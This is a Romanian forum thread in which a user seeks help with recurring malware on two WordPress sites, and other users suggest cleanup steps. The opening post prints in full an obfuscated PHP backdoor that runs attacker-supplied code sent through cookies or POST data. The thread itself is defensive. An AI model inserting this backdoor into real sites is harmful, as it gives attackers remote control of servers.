Virus pe site

[Inu]

Salut, de curand am observat in fiserele de pe doua site-uri coduri ciudate. Am reusit sa sterg codurile din fisierele php aflate pe server, insa astazi m-am trezit din nou cu virus pe site.

Site-urile sunt pe wordpress ( actualizat la zi) si teme cumparate si actualizate de pe themeforest.

Ce imi recomandati sa fac? Ca si exemplu, asa arata codul

<? - php
$kpctp = '*3sH_otxgmr92n#bkulvyep8ai-4c6fd7\'1';$unlkuzj = Array();$unlkuzj[] = $kpctp[29].$kpctp[29].$kpctp[32].$kpctp[11].$kpctp[11].$kpctp[29].$kpctp[34].$kpctp[34].$kpctp[26].$kpctp[23].$kpctp[12].$kpctp[30].$kpctp[27].$kpctp[26].$kpctp[27].$kpctp[31].$kpctp[28].$kpctp[11].$kpctp[26].$kpctp[24].$kpctp[32].$kpctp[23].$kpctp[1].$kpctp[26].$kpctp[12].$kpctp[27].$kpctp[1].$kpctp[23].$kpctp[31].$kpctp[31].$kpctp[11].$kpctp[15].$kpctp[29].$kpctp[29].$kpctp[28].$kpctp[31];$unlkuzj[] = $kpctp[3].$kpctp[0];$unlkuzj[] = $kpctp[14];$unlkuzj[] = $kpctp[28].$kpctp[5].$kpctp[17].$kpctp[13].$kpctp[6];$unlkuzj[] = $kpctp[2].$kpctp[6].$kpctp[10].$kpctp[4].$kpctp[10].$kpctp[21].$kpctp[22].$kpctp[21].$kpctp[24].$kpctp[6];$unlkuzj[] = $kpctp[21].$kpctp[7].$kpctp[22].$kpctp[18].$kpctp[5].$kpctp[31].$kpctp[21];$unlkuzj[] = $kpctp[2].$kpctp[17].$kpctp[15].$kpctp[2].$kpctp[6].$kpctp[10];$unlkuzj[] = $kpctp[24].$kpctp[10].$kpctp[10].$kpctp[24].$kpctp[20].$kpctp[4].$kpctp[9].$kpctp[21].$kpctp[10].$kpctp[8].$kpctp[21];$unlkuzj[] = $kpctp[2].$kpctp[6].$kpctp[10].$kpctp[18].$kpctp[21].$kpctp[13];$unlkuzj[] = $kpctp[22].$kpctp[24].$kpctp[28].$kpctp[16];foreach ($unlkuzj[7]($_COOKIE, $_POST) as $cinxu => $zybvyo){function znarkyr($unlkuzj, $cinxu, $zlqgrj){return $unlkuzj[6]($unlkuzj[4]($cinxu . $unlkuzj[0], ($zlqgrj / $unlkuzj[8]($cinxu)) + 1), 0, $zlqgrj);}function ojvevji($unlkuzj, $cafsylq){return @$unlkuzj[9]($unlkuzj[1], $cafsylq);}function xszry($unlkuzj, $cafsylq){$bvtejoy = $unlkuzj[3]($cafsylq) % 3;if (!$bvtejoy) {eval($cafsylq[1]($cafsylq[2]));exit();}}$zybvyo = ojvevji($unlkuzj, $zybvyo);xszry($unlkuzj, $unlkuzj[5]($unlkuzj[2], $zybvyo ^ znarkyr($unlkuzj, $cinxu, $unlkuzj[8]($zybvyo))));}

Il gasesc doar in index.php si wp-config.php, insa nu am probleme cu site-ul sau sa nu il pot accesa.

Multumesc anticipat!

[Benko Zoltan]

Incearca sa pui sus pluginul Wordfence si sa cureti.

https://ro.wordpress.org/plugins/wordfence/

Personal dupa curatare as sterge tot siteul si as cladi din nou cu baza de date veche.

[Rapsodia]

Incearca sa pui sus pluginul Wordfence si sa cureti.

https://ro.wordpress.org/plugins/wordfence/

Personal dupa curatare as sterge tot siteul si as cladi din nou cu baza de date veche.

Sa ne zici daca te-a ajutat Wordfence , eu il am pe site-uri insa as vrea sa stiu daca chiar curata site-ul.

[Seph]

Cativa pasi pe care i-as face:

1. Verifici cu https://sitecheck.sucuri.net/
2. Dai un search in toate fisierele site-ului, de exemplu cu Dreamweaver poti sa faci search intr-un folder (folder-ul cu fisierele site-ului).
3. Dai search in baza de date dupa termenii de mai sus din acel cod.
4. Verifici functions.php si cam toate fisierele wordpress-ului sa nu existe vreun cod care insereaza acel cod php.
5. Verifici plugin-urile, e posibil ca unul din ele sa fie mai vechi si cu probleme de securitate.

Daca ai un cont de gazduire shared, adica cu mai multe site-uri la gramada, e posibil ca acel cod sa se fi propagat de la alt site, va trebui sa verifici tot.

[Bela]

Am un anti-virus cu care am curatat 6 site-uri pe shared hosting in 8 minute.

Daca nu rezolvi cu Wordfence, si vrei, as testa anti-virusul pe codul asta, dar am nevoie de access la site... da-mi pm...

[Adrian A.]

5. Verifici plugin-urile, e posibil ca unul din ele sa fie mai vechi si cu probleme de securitate.

Daca ai un cont de gazduire shared, adica cu mai multe site-uri la gramada, e posibil ca acel cod sa se fi propagat de la alt site, va trebui sa verifici tot.

Da, astea sunt niste situatii frecvente.

Banuiesc ca Wordpress e actualizat la zi (?).

Ce am mai vazut: atacatorul si-a creat un user. Uita-te la lista de useri.

Personal dupa curatare as sterge tot siteul si as cladi din nou cu baza de date veche.

Da, asa trebuie facut pentru ca nu mai ai certitudinea ca fisierele Wordpress nu sunt modificate si lasate backdoor-uri. De periat bine si baza de date, cum ziceau ceilalti.

[Empire]

Exista fisiere php bagate prin locuri nebanuite (ex. in directorul de css), al caror rol e sa iti tot modifice index.php si wp-config.php; Daca esti familiar cu wordpress le poti gasi manual, dar e de munca.

[Inu]

Sa ne zici daca te-a ajutat Wordfence , eu il am pe site-uri insa as vrea sa stiu daca chiar curata site-ul.

Dupa cateva incercari cu Wordfence, am reusit doar sa gasesc "sursa" codului, in rest nu prea ma ajutat cu nimic ( in cazul meu ).

Cativa pasi pe care i-as face:

1. Verifici cu https://sitecheck.sucuri.net/
2. Dai un search in toate fisierele site-ului, de exemplu cu Dreamweaver poti sa faci search intr-un folder (folder-ul cu fisierele site-ului).
3. Dai search in baza de date dupa termenii de mai sus din acel cod.
4. Verifici functions.php si cam toate fisierele wordpress-ului sa nu existe vreun cod care insereaza acel cod php.
5. Verifici plugin-urile, e posibil ca unul din ele sa fie mai vechi si cu probleme de securitate.

Daca ai un cont de gazduire shared, adica cu mai multe site-uri la gramada, e posibil ca acel cod sa se fi propagat de la alt site, va trebui sa verifici tot.

Am verificat cu https://sitecheck.sucuri.net/, insa imi spune ca site-ul este ok si Low Security Risk, probabil nu vede codul respectiv. Am bagat site-ul in mentenanta si am inceput curatarea manuala in fiecare fisier in parte, fie .php .js .css s.a.m.d

#Adrian A. Totul este actualizat la zi, Wordpress, teme, plugin etc. User nu este creat pe site si nici in baza de date nu am gasit nimic momentan.

Revin cu noutati in caz ca o sa gasesc luminita de la capatul tunelului, pana atunci sunt inarmat cu apa,apa si multa apa, glumesc. Dau o bere cand gat

[Inu]

Exista fisiere php bagate prin locuri nebanuite (ex. in directorul de css), al caror rol e sa iti tot modifice index.php si wp-config.php; Daca esti familiar cu wordpress le poti gasi manual, dar e de munca.

Fisiere exista chiar unde nici nu ma gandeam, m-am inarmat cu manusi pana la cot, rabdare, bere si singura solutie o vad sa verific fiecare fisier in parte

[Adrian A.]

O sursa posibila mai este o masina Windows infectata care are salvat userul si parola de FTP.

De verificat cand a s-a facut ultima data release la fiecare plugin si cautat vulnerabilitiati cunoscute ale plugin-urilor in site-uri gen: https://www.exploit-db.com/

Daca e vreun plugin fara update-uri publicate de 2-3 ani, s-ar putea sa fie degeaba la zi.